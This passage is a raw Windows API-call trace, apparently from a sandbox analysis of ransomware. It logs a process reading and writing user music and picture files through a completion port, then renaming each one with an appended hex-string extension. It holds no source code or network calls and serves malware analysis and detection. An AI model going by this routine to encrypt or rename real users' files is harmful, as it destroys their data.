lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0167.889] ReadFile (in: hFile=0x5e4, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0167.889] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0167.892] NtQueryObject (in: Handle=0x5e4, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x76900b8, ReturnLength=0x702fa7c) returned 0x0 [0167.893] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\L4t6BhMlxA7aY-769Z.mp3", lpString2=".D44A42FBD5972F4A63A3B5DA57559D87B2AFF59CADEA72037A9751747A2FE043" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\L4t6BhMlxA7aY-769Z.mp3.D44A42FBD5972F4A63A3B5DA57559D87B2AFF59CADEA72037A9751747A2FE043") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\L4t6BhMlxA7aY-769Z.mp3.D44A42FBD5972F4A63A3B5DA57559D87B2AFF59CADEA72037A9751747A2FE043" [0167.893] GetProcessHeap () returned 0x270000 [0167.893] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x144) returned 0x4257c08 [0167.893] NtSetInformationFile (FileHandle=0x5e4, IoStatusBlock=0x702fa6c, FileInformation=0x4257c08, Length=0x144, FileInformationClass=0xa) returned 0x0 [0167.894] CloseHandle (hObject=0x5e4) returned 1 [0167.896] GetProcessHeap () returned 0x270000 [0167.897] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0167.906] RtlInterlockedCompareExchange64 () returned 0x1 [0167.906] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0167.912] ReadFile (in: hFile=0x5e4, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0167.912] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0167.912] WriteFile (in: hFile=0x5e4, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0167.913] RtlInterlockedCompareExchange64 () returned 0x0 [0167.914] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0167.924] NtQueryObject (in: Handle=0x5e4, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x76900b8, ReturnLength=0x702fa7c) returned 0x0 [0167.925] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\oFvRRFIKLRJYqIY4pS.m4a", lpString2=".700BCBA1E73F11DE27584C0AF1A4249F415C7AB9125D227F15433BA4DA5B3F2C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\oFvRRFIKLRJYqIY4pS.m4a.700BCBA1E73F11DE27584C0AF1A4249F415C7AB9125D227F15433BA4DA5B3F2C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\oFvRRFIKLRJYqIY4pS.m4a.700BCBA1E73F11DE27584C0AF1A4249F415C7AB9125D227F15433BA4DA5B3F2C" [0167.925] GetProcessHeap () returned 0x270000 [0167.925] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x144) returned 0x4257d60 [0167.925] NtSetInformationFile (FileHandle=0x5e4, IoStatusBlock=0x702fa6c, FileInformation=0x4257d60, Length=0x144, FileInformationClass=0xa) returned 0x0 [0167.927] CloseHandle (hObject=0x5e4) returned 1 [0167.928] GetProcessHeap () returned 0x270000 [0167.929] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0167.929] RtlInterlockedCompareExchange64 () returned 0x1 [0167.929] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0167.934] ReadFile (in: hFile=0x5e4, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0167.949] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0167.951] NtQueryObject (in: Handle=0x5e4, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x76900b8, ReturnLength=0x702fa7c) returned 0x0 [0167.952] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\oYzTnBxoMCh.mp3", lpString2=".C199483797C9FD46CBAE9EF131776B855AF73A4819828B7C0BF3F11BD19C366D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\oYzTnBxoMCh.mp3.C199483797C9FD46CBAE9EF131776B855AF73A4819828B7C0BF3F11BD19C366D") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\oYzTnBxoMCh.mp3.C199483797C9FD46CBAE9EF131776B855AF73A4819828B7C0BF3F11BD19C366D" [0167.952] GetProcessHeap () returned 0x270000 [0167.952] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x136) returned 0x4263ab0 [0167.953] NtSetInformationFile (FileHandle=0x5e4, IoStatusBlock=0x702fa6c, FileInformation=0x4263ab0, Length=0x136, FileInformationClass=0xa) returned 0x0 [0167.954] CloseHandle (hObject=0x5e4) returned 1 [0167.955] GetProcessHeap () returned 0x270000 [0167.957] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0167.957] RtlInterlockedCompareExchange64 () returned 0x1 [0167.958] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0167.967] ReadFile (in: hFile=0x5a4, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0167.969] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0167.971] NtQueryObject (in: Handle=0x5a4, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x76900b8, ReturnLength=0x702fa7c) returned 0x0 [0167.972] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\enJfnYk gyfr.mp3", lpString2=".4C6FFEF6599AA21194C4F3C57F0FB72411D9EE0BBF68F9059A0F520E2B093C2F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\enJfnYk gyfr.mp3.4C6FFEF6599AA21194C4F3C57F0FB72411D9EE0BBF68F9059A0F520E2B093C2F") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\enJfnYk gyfr.mp3.4C6FFEF6599AA21194C4F3C57F0FB72411D9EE0BBF68F9059A0F520E2B093C2F" [0167.972] GetProcessHeap () returned 0x270000 [0167.972] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x124) returned 0x4332578 [0167.972] NtSetInformationFile (FileHandle=0x5a4, IoStatusBlock=0x702fa6c, FileInformation=0x4332578, Length=0x124, FileInformationClass=0xa) returned 0x0 [0167.973] CloseHandle (hObject=0x5a4) returned 1 [0167.974] GetProcessHeap () returned 0x270000 [0167.977] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0167.981] RtlInterlockedCompareExchange64 () returned 0x1 [0167.981] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0167.989] ReadFile (in: hFile=0x5a4, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0167.990] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0167.992] NtQueryObject (in: Handle=0x5a4, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x76900b8, ReturnLength=0x702fa7c) returned 0x0 [0167.994] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\gh-g.m4a", lpString2=".F54379A27319F6759C0234F47EB9A7F93B214F7CC002A143655D653EC086531A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\gh-g.m4a.F54379A27319F6759C0234F47EB9A7F93B214F7CC002A143655D653EC086531A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\gh-g.m4a.F54379A27319F6759C0234F47EB9A7F93B214F7CC002A143655D653EC086531A" [0167.994] GetProcessHeap () returned 0x270000 [0167.994] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x114) returned 0x42f9c28 [0167.994] NtSetInformationFile (FileHandle=0x5a4, IoStatusBlock=0x702fa6c, FileInformation=0x42f9c28, Length=0x114, FileInformationClass=0xa) returned 0x0 [0167.996] CloseHandle (hObject=0x5a4) returned 1 [0167.997] GetProcessHeap () returned 0x270000 [0167.999] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0167.999] RtlInterlockedCompareExchange64 () returned 0x1 [0167.999] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0168.009] ReadFile (in: hFile=0x5e4, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0168.009] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0168.011] NtQueryObject (in: Handle=0x5e4, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x74c20b8, ReturnLength=0x702fa7c) returned 0x0 [0168.013] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\hXhYUZJtt_lYHHjNoSl.m4a", lpString2=".81610B17E7A0617FC44F2C97F421C0B577396E6E3E827D4087054F18F9A4E216" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\hXhYUZJtt_lYHHjNoSl.m4a.81610B17E7A0617FC44F2C97F421C0B577396E6E3E827D4087054F18F9A4E216") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\hXhYUZJtt_lYHHjNoSl.m4a.81610B17E7A0617FC44F2C97F421C0B577396E6E3E827D4087054F18F9A4E216" [0168.013] GetProcessHeap () returned 0x270000 [0168.013] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x13c) returned 0x42fb898 [0168.014] NtSetInformationFile (FileHandle=0x5e4, IoStatusBlock=0x702fa6c, FileInformation=0x42fb898, Length=0x13c, FileInformationClass=0xa) returned 0x0 [0168.016] CloseHandle (hObject=0x5e4) returned 1 [0168.019] GetProcessHeap () returned 0x270000 [0168.020] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0168.021] RtlInterlockedCompareExchange64 () returned 0x1 [0168.021] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0168.027] ReadFile (in: hFile=0x5e4, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0168.028] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0168.035] NtQueryObject (in: Handle=0x5e4, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x74c20b8, ReturnLength=0x702fa7c) returned 0x0 [0168.036] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\jkVcEzcZorxOQEzS.mp3", lpString2=".0D7D850551BE57002019E888857EDF8AE7DEED56D109379D7B9B8DDEAD3E5E0A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\jkVcEzcZorxOQEzS.mp3.0D7D850551BE57002019E888857EDF8AE7DEED56D109379D7B9B8DDEAD3E5E0A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\jkVcEzcZorxOQEzS.mp3.0D7D850551BE57002019E888857EDF8AE7DEED56D109379D7B9B8DDEAD3E5E0A" [0168.036] GetProcessHeap () returned 0x270000 [0168.036] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x136) returned 0x4263bf8 [0168.037] NtSetInformationFile (FileHandle=0x5e4, IoStatusBlock=0x702fa6c, FileInformation=0x4263bf8, Length=0x136, FileInformationClass=0xa) returned 0x0 [0168.038] CloseHandle (hObject=0x5e4) returned 1 [0168.041] GetProcessHeap () returned 0x270000 [0168.043] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0168.043] RtlInterlockedCompareExchange64 () returned 0x1 [0168.043] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0168.047] ReadFile (in: hFile=0x5e4, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0168.047] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0168.050] NtQueryObject (in: Handle=0x5e4, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x74c20b8, ReturnLength=0x702fa7c) returned 0x0 [0168.051] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\MTyX.wav", lpString2=".0DA0440BE97A17DEBF7C737650AF236BAD668E77A9FB823959BC9AFA5875192F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\MTyX.wav.0DA0440BE97A17DEBF7C737650AF236BAD668E77A9FB823959BC9AFA5875192F") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\MTyX.wav.0DA0440BE97A17DEBF7C737650AF236BAD668E77A9FB823959BC9AFA5875192F" [0168.051] GetProcessHeap () returned 0x270000 [0168.051] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11e) returned 0x42f9d50 [0168.051] NtSetInformationFile (FileHandle=0x5e4, IoStatusBlock=0x702fa6c, FileInformation=0x42f9d50, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0168.053] CloseHandle (hObject=0x5e4) returned 1 [0168.054] GetProcessHeap () returned 0x270000 [0168.055] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0168.056] RtlInterlockedCompareExchange64 () returned 0x1 [0168.056] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0168.060] ReadFile (in: hFile=0x58c, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0168.060] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0168.062] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x74c20b8, ReturnLength=0x702fa7c) returned 0x0 [0168.063] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\AXXYp8jRfDs2.wav", lpString2=".D9A4B71D0FFB42F35CEB658D075C0C89EC22682086B80B0B7F96088E577AD523" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\AXXYp8jRfDs2.wav.D9A4B71D0FFB42F35CEB658D075C0C89EC22682086B80B0B7F96088E577AD523") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\AXXYp8jRfDs2.wav.D9A4B71D0FFB42F35CEB658D075C0C89EC22682086B80B0B7F96088E577AD523" [0168.063] GetProcessHeap () returned 0x270000 [0168.063] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x152) returned 0x35ba10 [0168.063] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x702fa6c, FileInformation=0x35ba10, Length=0x152, FileInformationClass=0xa) returned 0x0 [0168.064] CloseHandle (hObject=0x58c) returned 1 [0168.065] GetProcessHeap () returned 0x270000 [0168.067] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0168.067] RtlInterlockedCompareExchange64 () returned 0x1 [0168.067] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0168.070] ReadFile (in: hFile=0x58c, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0168.070] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0168.072] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x74c20b8, ReturnLength=0x702fa7c) returned 0x0 [0168.073] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\BA6j3JLUworAXTFvl0mV.wav", lpString2=".33E83227678524E89941250E22933E86763985F343C8600746CD9F034E7E8445" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\BA6j3JLUworAXTFvl0mV.wav.33E83227678524E89941250E22933E86763985F343C8600746CD9F034E7E8445") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\BA6j3JLUworAXTFvl0mV.wav.33E83227678524E89941250E22933E86763985F343C8600746CD9F034E7E8445" [0168.073] GetProcessHeap () returned 0x270000 [0168.073] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x162) returned 0x7421510 [0168.074] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x702fa6c, FileInformation=0x7421510, Length=0x162, FileInformationClass=0xa) returned 0x0 [0168.075] CloseHandle (hObject=0x58c) returned 1 [0168.076] GetProcessHeap () returned 0x270000 [0168.078] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0168.078] RtlInterlockedCompareExchange64 () returned 0x1 [0168.078] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0168.081] ReadFile (in: hFile=0x58c, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0168.082] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0168.283] ReadFile (in: hFile=0x5e4, lpBuffer=0x7600180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048) returned 1 [0168.283] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0168.296] NtQueryObject (in: Handle=0x5cc, ObjectInformationClass=0x1, ObjectInformation=0x75aa780, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x75aa780, ReturnLength=0x702fa7c) returned 0x0 [0168.349] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\mVHSolkg25ErZnMeoaY9.jpg", lpString2=".FAD3113C82AA3C65B4701748669FAC213E39F49B34E5EC3A38898F2695323406" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\mVHSolkg25ErZnMeoaY9.jpg.FAD3113C82AA3C65B4701748669FAC213E39F49B34E5EC3A38898F2695323406") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\mVHSolkg25ErZnMeoaY9.jpg.FAD3113C82AA3C65B4701748669FAC213E39F49B34E5EC3A38898F2695323406" [0168.349] GetProcessHeap () returned 0x270000 [0168.349] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x142) returned 0x4257eb8 [0168.349] NtSetInformationFile (FileHandle=0x5cc, IoStatusBlock=0x702fa6c, FileInformation=0x4257eb8, Length=0x142, FileInformationClass=0xa) returned 0x0 [0168.358] CloseHandle (hObject=0x5cc) returned 1 [0168.359] GetProcessHeap () returned 0x270000 [0168.360] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75aa6d0 | out: hHeap=0x270000) returned 1 [0168.387] RtlInterlockedCompareExchange64 () returned 0x1 [0168.387] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0168.388] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x73e00f8, ReturnLength=0x702fa7c) 